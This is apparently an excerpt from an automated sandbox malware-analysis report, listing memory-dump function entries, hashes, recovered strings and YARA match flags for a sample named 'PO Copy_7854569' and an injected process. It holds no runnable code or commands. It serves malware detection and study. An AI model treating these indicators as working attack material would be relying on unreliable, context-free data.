                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 46c5de03337e6055d575fef467deb0804e06c8e86e24ef2baa08cd54ab733ae8
                            • Instruction ID: a15d857a449dec93b169e87e33d3a88ba780cacc5cee16f6d3ed8e1f80ff6ee4
                            • Opcode Fuzzy Hash: 46c5de03337e6055d575fef467deb0804e06c8e86e24ef2baa08cd54ab733ae8
                            • Instruction Fuzzy Hash: F590023120180402D10075584C48747500A97D0302F95C111A9164659FC665C9916631
                            Function 01672FB0 Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: df66f2603d0aa4bb0a55f43109269cbf0e8de03202dc4aa67cf4eea0b517c6c2
                            • Instruction ID: d17426581bb266eb979556f6adc7c9b10b3d17d3d0ea7482f65f957a8fd2e7ce
                            • Opcode Fuzzy Hash: df66f2603d0aa4bb0a55f43109269cbf0e8de03202dc4aa67cf4eea0b517c6c2
                            • Instruction Fuzzy Hash: 9C90022160140042414075688C84907900ABBE1311795C221A4998654EC55989655765
                            Function 01672F90 Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b3f5102003ba1f550a54cf3a70da2d6d3ad12a5f0da67ecd48c87ae0d423a406
                            • Instruction ID: b98da38bf73af73f7ca65e11356b5bfd241db848c4a81a565655cc8106e7c857
                            • Opcode Fuzzy Hash: b3f5102003ba1f550a54cf3a70da2d6d3ad12a5f0da67ecd48c87ae0d423a406
                            • Instruction Fuzzy Hash: 3C90023120180402D10075584C5470B500A97D0302F95C111A5164659EC62589516671
                            Function 01672E30 Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7acfad9f12deea8cd52dc86431db70b4a5e6beaeab3d753d47883882df3d6909
                            • Instruction ID: 0cc81ea747d704926870f6aa2b6fa684ad6a3498c85821d87f13997fbacad429
                            • Opcode Fuzzy Hash: 7acfad9f12deea8cd52dc86431db70b4a5e6beaeab3d753d47883882df3d6909
                            • Instruction Fuzzy Hash: 3290022130140402D10275584854607500ED7D1345FD5C112E5424659EC6258A53A232
                            Function 01672EE0 Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 164bba439073ea83d6b5ae97bd788db659c38147de06f722e68ff90fd1003a62
                            • Instruction ID: a1ca5e7726922f7c8cb59ba5828ef155108cfdd5e3557dfb49302408323fa529
                            • Opcode Fuzzy Hash: 164bba439073ea83d6b5ae97bd788db659c38147de06f722e68ff90fd1003a62
                            • Instruction Fuzzy Hash: 4D90026120180403D14079584C44607500A97D0302F95C111A6064659FCA298D516235
                            Function 01672EA0 Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: dc37cc5f09d3d9f1b62aee7bfb22a4c11bf1e4b523e17d6b4c3eb00a2fd3227d
                            • Instruction ID: 5c545f90bfe0544ca5874df924cd4be6ec43199e3b76d7cd190dbc5631e99002
                            • Opcode Fuzzy Hash: dc37cc5f09d3d9f1b62aee7bfb22a4c11bf1e4b523e17d6b4c3eb00a2fd3227d
                            • Instruction Fuzzy Hash: 9090027120140402D14075584844747500A97D0301F95C111A9064658FC6598ED56765
                            Function 01672E80 Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f5c15e86026e38fcb7dfd56b2fce7a50218eb60b984ebd3e5adfe9d6b3c8a25c
                            • Instruction ID: ee0976ee4e2b07ef5b86119e9d04459843d92bd51d837e4067112b5fb911c9e4
                            • Opcode Fuzzy Hash: f5c15e86026e38fcb7dfd56b2fce7a50218eb60b984ebd3e5adfe9d6b3c8a25c
                            • Instruction Fuzzy Hash: D090022160140502D10175584844617500F97D0341FD5C122A5024659FCA258A92A231
                            Function 01673010 Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ee744c5f2af85ee4f122880138a997cbcb0c60b725141a5e3a883cdd2296ee6d
                            • Instruction ID: 07ba15777218980f87767f12e23372568e65ad9c69a89e777e500d98beeba691
                            • Opcode Fuzzy Hash: ee744c5f2af85ee4f122880138a997cbcb0c60b725141a5e3a883cdd2296ee6d
                            • Instruction Fuzzy Hash: FA90022120184442D14076584C44B0F910A97E1302FD5C119A8156658DC91589555721
                            Function 01673090 Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 87560aa7246a62d696aa29b53802878bf01ff8eda392a68b0a81c350b24ae92e
                            • Instruction ID: 76de85af60ce4c779a0da4ee913f9c312bfd08d4f6a03501c50ef41ffd897fd9
                            • Opcode Fuzzy Hash: 87560aa7246a62d696aa29b53802878bf01ff8eda392a68b0a81c350b24ae92e
                            • Instruction Fuzzy Hash: 9890022124140802D14075588854707500BD7D0701F95C111A4024658EC6168A6567B1
                            Function 016739B0 Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c1563741cf241755e40ae80c784aca885ac3ec0066add83e5703d1d4987d4245
                            • Instruction ID: 113419347780e2b81d1c51d3a333c11b4a9bcae5b3bd111167b71366d4dd7543
                            • Opcode Fuzzy Hash: c1563741cf241755e40ae80c784aca885ac3ec0066add83e5703d1d4987d4245
                            • Instruction Fuzzy Hash: 6490022124545102D150755C4844617900AB7E0301F95C121A4814698EC55589556321
                            Function 01673D70 Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0099b175294bc6abf4f62aaaf14892b005b0fa0fb84272cc07353414c9d107cd
                            • Instruction ID: bfcd1968f7c1b9439749c9ce1d23a37be334ba389846f0a1970520ac31808115
                            • Opcode Fuzzy Hash: 0099b175294bc6abf4f62aaaf14892b005b0fa0fb84272cc07353414c9d107cd
                            • Instruction Fuzzy Hash: 9C90023520140402D51075585C44647504B97D0301F95D511A442465CEC65489A1A221
                            Function 01673D10 Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e6594af3809aaa575dbe4eaf15b2ef74e83d841bd201a1e32b059ed61b438454
                            • Instruction ID: 33a3b9229b221c429f5b0adb5fa5c57abe895b9fc1e3d2bee5efd0ca96124b8c
                            • Opcode Fuzzy Hash: e6594af3809aaa575dbe4eaf15b2ef74e83d841bd201a1e32b059ed61b438454
                            • Instruction Fuzzy Hash: 5290023120240142954076585C44A4F910A97E1302BD5D515A4015658DC91489615321
                            Function 01672C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                            • Instruction ID: f964f8ecaa444ff9580cb0a20d828d8a3c9c042a0feaba01db0fb43473a962cf
                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                            • Instruction Fuzzy Hash:
                            Function 01672890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: ___swprintf_l
                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                            • API String ID: 48624451-2108815105
                            • Opcode ID: c40539e092813e65167b4777f34f7fcbe6f0a0657a55a0b2c9cf779889b1fc0f
                            • Instruction ID: 1d096a4c89a9d4909213187ff3ae3122c4fbd87f756b43db9fd17eaebb01560a
                            • Opcode Fuzzy Hash: c40539e092813e65167b4777f34f7fcbe6f0a0657a55a0b2c9cf779889b1fc0f
                            • Instruction Fuzzy Hash: A251D5B6A00116AFDB11DF9D8CA097EFBB8BB08240B54826EE4A5D7741D334DE45CBA4
                            Function 016E2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: ___swprintf_l
                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                            • API String ID: 48624451-2108815105
                            • Opcode ID: 3d5469099336fe431a67f996e9fd7c7202728a030f62232e9864182dc9c0545f
                            • Instruction ID: dea8c3f6ba1557017e3f6985aa5e390e95d6b02686b50bf361817b270577f4fd
                            • Opcode Fuzzy Hash: 3d5469099336fe431a67f996e9fd7c7202728a030f62232e9864182dc9c0545f
                            • Instruction Fuzzy Hash: 2051F671A01655AECB30DF5CCDA497FBBFEEB48200B048A5DE596C7741E7B4EA408B60
                            Function 01667630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                            Download Yara Rule
                            Strings
                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 016A4655
                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 016A46FC
                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 016A4725
                            • ExecuteOptions, xrefs: 016A46A0
                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 016A4787
                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 016A4742
                            • Execute=1, xrefs: 016A4713
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                            • API String ID: 0-484625025
                            • Opcode ID: 4a0417b8f1a7fa76e1cca5fbcb6f2bede953ab4ebbff2832b131d2800855011e
                            • Instruction ID: 0cbecb896c0121040c59d9b24075cc206b698afd84c68e885751940889092baf
                            • Opcode Fuzzy Hash: 4a0417b8f1a7fa76e1cca5fbcb6f2bede953ab4ebbff2832b131d2800855011e
                            • Instruction Fuzzy Hash: B2513A316002197AEF21ABA9DC85FBE7BADEF15308F4800ADD605E7291EB719E418F54
                            Function 01706940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                            • Instruction ID: 9953863e17c44dfd1610cbd0100d459490ee1f21b024d92ec36b0a0b96244869
                            • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                            • Instruction Fuzzy Hash: FC022671508342AFD70ACF18C8A4A6BFBE5FFC8714F14892DB9854B2A4DB31E945CB52
                            Function 0167B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: __aulldvrm
                            • String ID: +$-$0$0
                            • API String ID: 1302938615-699404926
                            • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                            • Instruction ID: 594b93f204c5c02190634ab92ec5094c060f326ed68416cd4f9b0d894cf1b2af
                            • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                            • Instruction Fuzzy Hash: 4D81BE70E052599EEF29CE6CCC917FEBBB2AF45320F1C421AE961A7391C7349841CB65
                            Function 016E20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: ___swprintf_l
                            • String ID: %%%u$[$]:%u
                            • API String ID: 48624451-2819853543
                            • Opcode ID: dd67b1a474283c110acb87eed11169fbb80be38e8a5a3d8b84ba28ac01f2ef2a
                            • Instruction ID: 3f07eb93475db4ff27151fb356d21707dcfe0971d89e3efba7efb0272cc4e702
                            • Opcode Fuzzy Hash: dd67b1a474283c110acb87eed11169fbb80be38e8a5a3d8b84ba28ac01f2ef2a
                            • Instruction Fuzzy Hash: A621657AA01119ABDB10DF79CC54AFE7BFEEF54651F04021EEA05E3200E730DA158BA1
                            Function 0165F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                            Download Yara Rule
                            Strings
                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 016A02BD
                            • RTL: Re-Waiting, xrefs: 016A031E
                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 016A02E7
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                            • API String ID: 0-2474120054
                            • Opcode ID: c7f9ca1844579dd2cbda40f3d5196bf9894a7200562966874bcc9677d23ab7b3
                            • Instruction ID: ba68afeb5ec485a74deb970ec9fea65cadf0f9c4029dff9bec52f6c991b99ec8
                            • Opcode Fuzzy Hash: c7f9ca1844579dd2cbda40f3d5196bf9894a7200562966874bcc9677d23ab7b3
                            • Instruction Fuzzy Hash: DCE1CE306047429FD765CF28CC84B2ABBE1BB88314F144AADF9A58B3E1D774E945CB52
                            Function 0166BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                            Download Yara Rule
                            Strings
                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 016A7B7F
                            • RTL: Re-Waiting, xrefs: 016A7BAC
                            • RTL: Resource at %p, xrefs: 016A7B8E
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                            • API String ID: 0-871070163
                            • Opcode ID: cd0b199f4c5a9c528bc22aec3397cffab2342101fe211ed93ff915b78e0b3d01
                            • Instruction ID: 94e9ea171d3a4ea76b36c75e869ea9becc47574ddf8bd923f7f96c9b6add0603
                            • Opcode Fuzzy Hash: cd0b199f4c5a9c528bc22aec3397cffab2342101fe211ed93ff915b78e0b3d01
                            • Instruction Fuzzy Hash: 3A41E2313007029FD725DE2DCC40B6AB7EAEF98710F100A2DE956DB790DB72E8058B95
                            Function 0166B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                            Download Yara Rule
                            APIs
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 016A728C
                            Strings
                            • RTL: Re-Waiting, xrefs: 016A72C1
                            • RTL: Resource at %p, xrefs: 016A72A3
                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 016A7294
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                            • API String ID: 885266447-605551621
                            • Opcode ID: 20302db1ae188887666e34499ad91442adc66f4fd57e03c72a3bbbb839b9073e
                            • Instruction ID: 2f47845f2ac00a4568eaffd5558c7033581878f9ee6f6a29a1e78e63af276c61
                            • Opcode Fuzzy Hash: 20302db1ae188887666e34499ad91442adc66f4fd57e03c72a3bbbb839b9073e
                            • Instruction Fuzzy Hash: 9041D031701606ABD721DE29CC41B6ABBAAFF94710F14862DF955EB340DB31F8428BD5
                            Function 016E2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: ___swprintf_l
                            • String ID: %%%u$]:%u
                            • API String ID: 48624451-3050659472
                            • Opcode ID: 33dbbcc057d57bbd7ee664438bb9fe1b8fe9f3439de2a3edcdd4c3f3ae6e2cf1
                            • Instruction ID: 31d613d151064c6c1ddab185c97a20c1c534cc4a1bfe41b9a60699aa5222d805
                            • Opcode Fuzzy Hash: 33dbbcc057d57bbd7ee664438bb9fe1b8fe9f3439de2a3edcdd4c3f3ae6e2cf1
                            • Instruction Fuzzy Hash: D1318272A016199FDB20DE2DCC54BEEB7FDEB44610F44465EE949E3200EB30AA458FA0
                            Function 01677D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: __aulldvrm
                            • String ID: +$-
                            • API String ID: 1302938615-2137968064
                            • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                            • Instruction ID: b2d3fa54562718df6e3e32fd6bc97652ec0aa61de9dd2fee2a18445b739e0491
                            • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                            • Instruction Fuzzy Hash: C491A171E0020A9BEB24DF6DCD88ABEBBA5EF44320F14461AE955E73C0D7349D41CB61
                            Function 01639126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID: $$@
                            • API String ID: 0-1194432280
                            • Opcode ID: be027be2393cb73082fd8f48858574517e1e2a5b520c3b88f1ae69ca877edc40
                            • Instruction ID: 84235301f3689de33a8ac26e5df1fca43417daee62713d3fef6f8ac8ace3681f
                            • Opcode Fuzzy Hash: be027be2393cb73082fd8f48858574517e1e2a5b520c3b88f1ae69ca877edc40
                            • Instruction Fuzzy Hash: C1811B76D002699BDB31CF54CC54BEAB7B8AF48714F0441DAEA19B7280D7709E85CFA4

                            Executed Functions

                            Function 03894E2A Relevance: 29.2, Strings: 23, Instructions: 427COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: Mh$*r$,$3e$A$A$A4$B?$D$F$Mh3e$O$O$SR$X8$Y$d~$f$g&$h%$m$rp$t
                            • API String ID: 0-3582917983
                            • Opcode ID: ef6a184c884f00fad5f14e57b47cce722697d120d7b28afd4f2dd62e836c01e4
                            • Instruction ID: 4b27be6bcaba1450f7ac42df24339f1f949a0eaea67a8ee5216accc69d8ef349
                            • Opcode Fuzzy Hash: ef6a184c884f00fad5f14e57b47cce722697d120d7b28afd4f2dd62e836c01e4
                            • Instruction Fuzzy Hash: 6932C0B0D05228CFEF25CF85C894BDDBBB2BB46308F1481DAC149AB280D7B55A89CF55
                            Function 038A256A Relevance: 6.4, Strings: 5, Instructions: 147COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 6$O$S$\$s
                            • API String ID: 0-3854637164
                            • Opcode ID: 618de5acc1a4419a344b764fe64491fc93f324c16efb8aba1496f63e729fbae7
                            • Instruction ID: 4dbcc22d729c5310485bf84b4c9d30f902cbfb89ae0f284cf47bbf0988e2a416
                            • Opcode Fuzzy Hash: 618de5acc1a4419a344b764fe64491fc93f324c16efb8aba1496f63e729fbae7
                            • Instruction Fuzzy Hash: E541C7B2900619BADB24EFD8DC45FEAB3BCEF44310F0445D5E909DB201E771AA148BE1
                            Function 038B00BA Relevance: 2.6, Strings: 2, Instructions: 60COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: :V$<J
                            • API String ID: 0-426457097
                            • Opcode ID: 4e71d56e765f910013f67112b4c2c3ace6f36cf94c2169b2628089177e84139f
                            • Instruction ID: 24a465c399b2c717859e1437af34e6884fd1f1c2ab2611cefa0a754a8f93eba9
                            • Opcode Fuzzy Hash: 4e71d56e765f910013f67112b4c2c3ace6f36cf94c2169b2628089177e84139f
                            • Instruction Fuzzy Hash: E911ECB6D01219AF8B00DFE9DC409EEBBF9EF48210F0445AAE919E7200E7705A048FA1
                            Function 038AEDFA Relevance: 2.5, Strings: 2, Instructions: 46COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 2t$@N
                            • API String ID: 0-258624828
                            • Opcode ID: f94c1a4934a72b27f66e72f2ecac1ab3285609680565a46bda4080b7762798b8
                            • Instruction ID: 5881e5dfa7c731db294813c13c59d727651e33646880aa2767eb6375879d22da
                            • Opcode Fuzzy Hash: f94c1a4934a72b27f66e72f2ecac1ab3285609680565a46bda4080b7762798b8
                            • Instruction Fuzzy Hash: AA019EB6C01219AE9B44EFE8D9419EEBBF9BB08200F14456AD919F6200E7745654CBA1
                            Function 038AEE8A Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3810000_sXAKgqpSAiGEzhyDsUSKBxPWz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: N}
                            • API String ID: 0-26705397
                            • Opcode ID: c635c8b0062e8f94e6e2f81e8dec5f310917d09610803b77acf89a12a32f92f1
                            • Instruction ID: e4c1de2981c4a288b52ed3abd6bc7104c3066946f711108b61f1cb05ba59e988
                            • Opcode Fuzzy Hash: c635c8b0062e8f94e6e2f81e8dec5f310917d09610803b77acf89a12a32f92f1
                            • Instruction Fuzzy Hash: 4411EFB6D11219AF9B00DFE9DD409EEB7F9EF48210F1446AAE919E7204E7705A048BA1
                            Function 0388EA0A Relevance: .1, Instructions: 130COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000007.00000002.4440475032.0000000003810000.00000040.00000001.00040000.00000000.sdmp, Offset: 03810000, based on PE: false
                            Joe Sandbox IDA Plugin
